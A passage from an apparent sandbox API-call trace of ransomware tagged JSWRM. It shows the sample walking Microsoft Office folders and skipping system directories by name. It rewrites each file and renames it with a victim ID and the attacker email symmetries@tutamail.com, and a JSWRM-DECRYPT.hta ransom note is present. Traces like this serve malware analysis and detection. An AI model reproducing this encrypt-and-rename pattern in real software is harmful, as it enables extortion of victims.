lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0113.030] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0113.030] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\x-none\\DCF.x-none.msi.16_mondoww.mcxml" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\x-none\\dcf.x-none.msi.16_mondoww.mcxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0113.031] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=602774) returned 1 [0113.031] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.031] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24c1d0 [0113.031] ReadFile (in: hFile=0x238, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0113.042] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.042] WriteFile (in: hFile=0x238, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0113.043] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0113.043] CloseHandle (hObject=0x238) returned 1 [0113.043] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0113.043] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0113.043] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0113.043] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0113.043] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0113.043] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0113.043] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0113.043] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0113.043] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0113.043] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0113.043] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24c000 [0113.043] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f848 [0113.043] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c000 | out: hHeap=0x1e0000) returned 1 [0113.043] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0113.043] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\x-none\\DCF.x-none.msi.16_mondoww.mcxml" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\x-none\\dcf.x-none.msi.16_mondoww.mcxml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\x-none\\DCF.x-none.msi.16_mondoww.mcxml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\x-none\\dcf.x-none.msi.16_mondoww.mcxml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0113.044] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f848 | out: hHeap=0x1e0000) returned 1 [0113.044] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0113.044] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0113.044] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0113.044] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0113.044] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x11672e1a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x11672e1a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x11699072, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x21d4ee, dwReserved0=0x60002, dwReserved1=0x2097ea, cFileName="Excel.x-none.msi.16_mondoww.mcxml", cAlternateFileName="EXCELX~1.MCX")) returned 1 [0113.044] lstrcmpiW (lpString1="Excel.x-none.msi.16_mondoww.mcxml", lpString2=".") returned 1 [0113.045] lstrcmpiW (lpString1="Excel.x-none.msi.16_mondoww.mcxml", lpString2="..") returned 1 [0113.045] lstrcmpiW (lpString1="Excel.x-none.msi.16_mondoww.mcxml", lpString2="...") returned 1 [0113.045] lstrcmpiW (lpString1="Excel.x-none.msi.16_mondoww.mcxml", lpString2="windows") returned -1 [0113.045] lstrcmpiW (lpString1="Excel.x-none.msi.16_mondoww.mcxml", lpString2="recovery") returned -1 [0113.045] lstrcmpiW (lpString1="Excel.x-none.msi.16_mondoww.mcxml", lpString2="perflogs") returned -1 [0113.045] lstrcmpiW (lpString1="Excel.x-none.msi.16_mondoww.mcxml", lpString2="documents and settings") returned 1 [0113.045] lstrcmpiW (lpString1="Excel.x-none.msi.16_mondoww.mcxml", lpString2="$RECYCLE.BIN") returned 1 [0113.045] lstrcmpiW (lpString1="Excel.x-none.msi.16_mondoww.mcxml", lpString2="system volume information") returned -1 [0113.045] lstrcmpiW (lpString1="Excel.x-none.msi.16_mondoww.mcxml", lpString2="msocache") returned -1 [0113.045] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c3d8 [0113.045] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Excel.x-none.msi.16_mondoww.mcxml", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0113.045] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0113.045] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Excel.x-none.msi.16_mondoww.mcxml", cchWideChar=33, lpMultiByteStr=0x22d0a0, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Excel.x-none.msi.16_mondoww.mcxml", lpUsedDefaultChar=0x0) returned 33 [0113.045] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c3d8 | out: hHeap=0x1e0000) returned 1 [0113.045] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0113.045] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Excel.x-none.msi.16_mondoww.mcxml", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0113.045] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0113.045] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Excel.x-none.msi.16_mondoww.mcxml", cchWideChar=33, lpMultiByteStr=0x22cdc8, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Excel.x-none.msi.16_mondoww.mcxml", lpUsedDefaultChar=0x0) returned 33 [0113.045] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0113.045] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2363b0 [0113.045] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236018 | out: hHeap=0x1e0000) returned 1 [0113.045] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0113.045] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0113.045] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235d38 [0113.045] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\x-none\\Excel.x-none.msi.16_mondoww.mcxml" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\x-none\\excel.x-none.msi.16_mondoww.mcxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0113.046] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2217198) returned 1 [0113.046] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.046] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24c1d0 [0113.046] ReadFile (in: hFile=0x238, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0113.057] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.057] WriteFile (in: hFile=0x238, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0113.058] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0113.058] CloseHandle (hObject=0x238) returned 1 [0113.058] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0113.058] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0113.058] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0113.058] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0113.058] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0113.058] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0113.058] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0113.058] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0113.058] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0113.058] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0113.058] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b510 [0113.058] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f030 [0113.058] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b510 | out: hHeap=0x1e0000) returned 1 [0113.058] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0113.058] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\x-none\\Excel.x-none.msi.16_mondoww.mcxml" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\x-none\\excel.x-none.msi.16_mondoww.mcxml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\x-none\\Excel.x-none.msi.16_mondoww.mcxml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\x-none\\excel.x-none.msi.16_mondoww.mcxml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0113.059] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f030 | out: hHeap=0x1e0000) returned 1 [0113.059] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0113.059] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235d38 | out: hHeap=0x1e0000) returned 1 [0113.059] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0113.059] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0113.059] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x11699072, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x11699072, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x11699072, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x36bf4, dwReserved0=0x60002, dwReserved1=0x2097ea, cFileName="Groove.x-none.msi.16_mondoww.mcxml", cAlternateFileName="GROOVE~1.MCX")) returned 1 [0113.059] lstrcmpiW (lpString1="Groove.x-none.msi.16_mondoww.mcxml", lpString2=".") returned 1 [0113.059] lstrcmpiW (lpString1="Groove.x-none.msi.16_mondoww.mcxml", lpString2="..") returned 1 [0113.059] lstrcmpiW (lpString1="Groove.x-none.msi.16_mondoww.mcxml", lpString2="...") returned 1 [0113.059] lstrcmpiW (lpString1="Groove.x-none.msi.16_mondoww.mcxml", lpString2="windows") returned -1 [0113.059] lstrcmpiW (lpString1="Groove.x-none.msi.16_mondoww.mcxml", lpString2="recovery") returned -1 [0113.059] lstrcmpiW (lpString1="Groove.x-none.msi.16_mondoww.mcxml", lpString2="perflogs") returned -1 [0113.059] lstrcmpiW (lpString1="Groove.x-none.msi.16_mondoww.mcxml", lpString2="documents and settings") returned 1 [0113.059] lstrcmpiW (lpString1="Groove.x-none.msi.16_mondoww.mcxml", lpString2="$RECYCLE.BIN") returned 1 [0113.059] lstrcmpiW (lpString1="Groove.x-none.msi.16_mondoww.mcxml", lpString2="system volume information") returned -1 [0113.059] lstrcmpiW (lpString1="Groove.x-none.msi.16_mondoww.mcxml", lpString2="msocache") returned -1 [0113.059] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf60 [0113.059] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Groove.x-none.msi.16_mondoww.mcxml", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0113.059] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0113.059] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Groove.x-none.msi.16_mondoww.mcxml", cchWideChar=34, lpMultiByteStr=0x22cdc8, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Groove.x-none.msi.16_mondoww.mcxml", lpUsedDefaultChar=0x0) returned 34 [0113.059] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf60 | out: hHeap=0x1e0000) returned 1 [0113.060] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c3d8 [0113.060] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Groove.x-none.msi.16_mondoww.mcxml", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0113.060] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0113.060] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Groove.x-none.msi.16_mondoww.mcxml", cchWideChar=34, lpMultiByteStr=0x22d0a0, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Groove.x-none.msi.16_mondoww.mcxml", lpUsedDefaultChar=0x0) returned 34 [0113.060] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c3d8 | out: hHeap=0x1e0000) returned 1 [0113.060] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236018 [0113.060] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2363b0 | out: hHeap=0x1e0000) returned 1 [0113.060] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0113.060] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0113.060] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235d38 [0113.060] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\x-none\\Groove.x-none.msi.16_mondoww.mcxml" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\x-none\\groove.x-none.msi.16_mondoww.mcxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0113.061] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=224244) returned 1 [0113.061] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.061] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24c1d0 [0113.061] ReadFile (in: hFile=0x238, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0113.072] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.072] WriteFile (in: hFile=0x238, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0113.072] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0113.072] CloseHandle (hObject=0x238) returned 1 [0113.073] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0113.073] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0113.073] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0113.073] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0113.073] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0113.073] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0113.073] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0113.073] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1e0 [0113.073] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1e0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0113.073] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1e0 | out: hHeap=0x1e0000) returned 1 [0113.073] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b6a0 [0113.073] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f970 [0113.073] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b6a0 | out: hHeap=0x1e0000) returned 1 [0113.073] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0113.073] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\x-none\\Groove.x-none.msi.16_mondoww.mcxml" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\x-none\\groove.x-none.msi.16_mondoww.mcxml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\x-none\\Groove.x-none.msi.16_mondoww.mcxml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\x-none\\groove.x-none.msi.16_mondoww.mcxml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0113.074] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f970 | out: hHeap=0x1e0000) returned 1 [0113.074] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0113.074] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235d38 | out: hHeap=0x1e0000) returned 1 [0113.074] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0113.074] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0113.074] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3a021383, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x3a021383, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x3a021383, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x2097ea, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0113.074] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0113.074] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0113.074] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0113.074] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0113.074] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0113.074] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0113.074] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0113.074] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0113.074] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0113.074] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0113.074] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0113.074] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0113.074] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0113.074] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2413a8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0113.075] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0113.075] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0113.075] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0113.075] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0113.075] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2412b8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0113.075] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0113.075] RtlAllocateHeap (HeapHandle=0x1e0000, 